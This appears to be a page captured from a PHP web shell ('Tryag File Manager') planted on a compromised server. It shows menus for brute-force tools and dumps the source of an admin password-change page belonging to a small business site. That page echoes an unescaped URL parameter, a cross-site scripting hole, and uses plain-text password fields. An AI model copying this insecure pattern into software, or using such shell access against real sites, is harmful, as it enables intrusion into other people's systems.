Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
ynormeco
/
.trash
/
admin
/
Or
Select Your Path :
Upload File :
New :
File
Dir
//home/ynormeco/.trash/admin/changepass.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"/> <meta http-equiv="X-UA-Compatible" content="IE=edge"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <meta name="description" content=""/> <meta name="author" content=""/> <title>Ynorme Solutions</title> <link rel="icon" href="assets/images/favicon.ico" type="image/x-icon"> <!-- Bootstrap core CSS--> <link href="assets/css/bootstrap.min.css" rel="stylesheet"/> <!-- animate CSS--> <link href="assets/css/animate.css" rel="stylesheet" type="text/css"/> <!-- Icons CSS--> <link href="assets/css/icons.css" rel="stylesheet" type="text/css"/> <!-- Custom Style--> <link href="assets/css/app-style.css" rel="stylesheet"/> </head> <body class="bg-theme bg-theme1"> <!-- Start wrapper--> <div id="wrapper"> <div class="card card-authentication1 mx-auto my-5"> <div class="card-body"> <div class="card-content p-2"> <div class="card-title text-uppercase pb-2" align="center">Change Password</div> <form method="post" action="updatepass.php"> <?php $error=isset($_GET['msg']) ? $_GET['msg']: null; echo "<center><b><p style='color:red;'>".$error."</p></b></center>"; ?> <div class="form-group"> <div class="position-relative has-icon-right"> <input type="text" id="exampleInputEmailAddress" name="old" class="form-control input-shadow" placeholder=" Enter Old password" autocomplete="off" required=""> <div class="form-control-position"> </div> </div> </div> <div class="form-group"> <div class="position-relative has-icon-right"> <input type="text" id="exampleInputEmailAddress" name="new" class="form-control input-shadow" placeholder="Enter New password" autocomplete="off" required=""> <div class="form-control-position"> </div> </div> </div> <div class="form-group"> <div class="position-relative has-icon-right"> <input type="text" id="exampleInputEmailAddress" name="confirm" class="form-control input-shadow" placeholder="Confirm password" autocomplete="off" required=""> <div class="form-control-position"> </div> </div> </div><br> <button type="submit" class="btn btn-light btn-block mt-3">Change Password</button><br> <div class="form-group" align="center"> <a href="index.php">Sign In</a> </div> </form> </div> </div> </div> <!--End Dashboard Content--> </div> <!-- End container-fluid--> </div><!--End content-wrapper--> <!-- Bootstrap core JavaScript--> <script src="assets/js/jquery.min.js"></script> <script src="assets/js/popper.min.js"></script> <script src="assets/js/bootstrap.min.js"></script> <!-- sidebar-menu js --> <script src="assets/js/sidebar-menu.js"></script> <!-- Custom scripts --> <script src="assets/js/app-script.js"></script> </body> </html>